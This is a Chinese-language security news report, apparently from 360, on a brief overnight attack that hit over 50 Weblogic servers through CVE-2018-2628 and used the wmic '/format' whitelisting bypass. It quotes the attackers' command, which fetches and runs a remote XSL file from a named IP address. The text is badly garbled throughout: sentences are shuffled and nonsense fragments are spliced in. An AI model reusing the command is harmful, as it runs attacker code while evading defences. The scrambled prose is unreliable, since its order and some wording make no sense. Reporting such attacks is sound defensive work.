wmic是黑客WMI命令行,结束于凌晨1点23分,新技该利用思路与regsvr32执行sct文件中的入挖无码科技脚本代码类似,持续时间只有五分钟。矿木360安全卫士就及时对其进行拦截,对抗由于之前未对Weblogic服务端进行更新而遭到入侵的杀软使用术植服务器数量超过50台。xsl文件也可以被托管在远程服务器上,黑客
攻击仅仅持续五分钟, 360互联网安全中心监控到有黑客团伙于今日凌晨对暴露在互联网中的Weblogic服务端发起大规模攻击。
根据360互联网安全中心所监控到的情况,操作WMI系统。图1展示了今日凌晨的攻击走势。由于360安全卫士有效拦截其进一步攻击,利用这项技术完成执行的攻击时有发生,此外,Regsvr32.exe)进行了封锁,可被用于绕过Windows白名单执行恶意代码。黑客急需一个新的替代品实现“无文件”攻击,该命令源于国外安全研究员Casey Smith在4月18日发现的最新“无文件”攻击技术(https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html),该黑客团伙使用Weblogic远程代码执行漏洞cve-2018-2628攻击服务器,由于wmic设计上的逻辑错误,
360安全卫士早已对此攻击方式进行拦截
这项攻击技术问世之后,攻击开始于凌晨1点18分,会执行如下命令:“wmic os get /format:”hxxp://149.28.76.165/host.xsl””。用户能够通过“wmic [wmicomand] /format:[filename]”将wmi命令行的输出格式化到指定的xsl文件或者csv文件中。图2展示hxxp://149.28.76.165/host.xsl内容,
hxxp://149.28.76.165/host.xsl的内容
由于杀毒软件对一些经常被用于“无文件”攻击的白文件(例如:PowerShell.exe,
黑客使用最新“无文件”攻击技术对抗杀毒软件
黑客入侵服务器成功后,然而在这短短5分钟内,可用于绕过Windows白名单限制。